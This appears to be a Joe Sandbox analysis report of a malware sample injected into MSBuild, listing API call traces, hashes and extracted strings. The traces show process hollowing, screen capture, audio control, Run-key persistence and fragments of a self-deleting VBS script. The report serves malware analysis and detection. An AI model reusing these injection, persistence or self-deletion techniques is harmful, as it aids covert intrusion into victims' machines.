                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-3916222277
                                          • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                          • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                          • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                          • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                          • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                          • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                          • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                          APIs
                                            • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: lJD
                                          • API String ID: 1084509184-3316369744
                                          • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                          • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                          • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                          • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                          APIs
                                            • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: lJD
                                          • API String ID: 1084509184-3316369744
                                          • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                          • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                          • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                          • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: GetLocaleInfoEx
                                          • API String ID: 2299586839-2904428671
                                          • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                          • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                          • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                          • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                          • HeapFree.KERNEL32(00000000), ref: 004120EE
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$FreeProcess
                                          • String ID:
                                          • API String ID: 3859560861-0
                                          • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                          • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                          • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                          • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                          APIs
                                            • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                          • String ID:
                                          • API String ID: 1663032902-0
                                          • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                          • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                          • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                          • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                          APIs
                                            • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale_abort_free
                                          • String ID:
                                          • API String ID: 2692324296-0
                                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                          • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                          • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                          • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                          • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                          • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                          APIs
                                            • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                          • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                          • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                          • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                          • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                          APIs
                                            • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                          • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                          • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                          • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                          • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                          • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                          • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                          • Instruction Fuzzy Hash:
                                          APIs
                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                            • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                          • DeleteDC.GDI32(00000000), ref: 00418F2A
                                          • DeleteDC.GDI32(00000000), ref: 00418F2D
                                          • DeleteObject.GDI32(00000000), ref: 00418F30
                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                          • DeleteDC.GDI32(00000000), ref: 00418F62
                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                          • GetIconInfo.USER32(?,?), ref: 00418FBD
                                          • DeleteObject.GDI32(?), ref: 00418FEC
                                          • DeleteObject.GDI32(?), ref: 00418FF9
                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                          • DeleteDC.GDI32(?), ref: 0041917C
                                          • DeleteDC.GDI32(00000000), ref: 0041917F
                                          • DeleteObject.GDI32(00000000), ref: 00419182
                                          • GlobalFree.KERNEL32(?), ref: 0041918D
                                          • DeleteObject.GDI32(00000000), ref: 00419241
                                          • GlobalFree.KERNEL32(?), ref: 00419248
                                          • DeleteDC.GDI32(?), ref: 00419258
                                          • DeleteDC.GDI32(00000000), ref: 00419263
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                          • String ID: DISPLAY
                                          • API String ID: 479521175-865373369
                                          • Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                                          • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                          • Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                                          • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                          • ResumeThread.KERNEL32(?), ref: 00418435
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                          • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                          • GetLastError.KERNEL32 ref: 0041847A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                          • API String ID: 4188446516-108836778
                                          • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                          • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                          • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                          • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                          APIs
                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                            • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                            • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                          • ExitProcess.KERNEL32 ref: 0040D7D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                          • API String ID: 1861856835-332907002
                                          • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                          • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                          • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                          • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                          APIs
                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                            • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                          • ExitProcess.KERNEL32 ref: 0040D419
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                          • API String ID: 3797177996-2557013105
                                          • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                          • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                          • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                          • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                          • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                          • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                          • GetCurrentProcessId.KERNEL32 ref: 00412541
                                          • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                          • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                            • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                          • Sleep.KERNEL32(000001F4), ref: 00412682
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                          • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                          • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                          • String ID: .exe$8SG$WDH$exepath$open$temp_
                                          • API String ID: 2649220323-436679193
                                          • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                          • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                          • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                          • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                          APIs
                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                          • SetEvent.KERNEL32 ref: 0041B219
                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                          • CloseHandle.KERNEL32 ref: 0041B23A
                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                          Strings
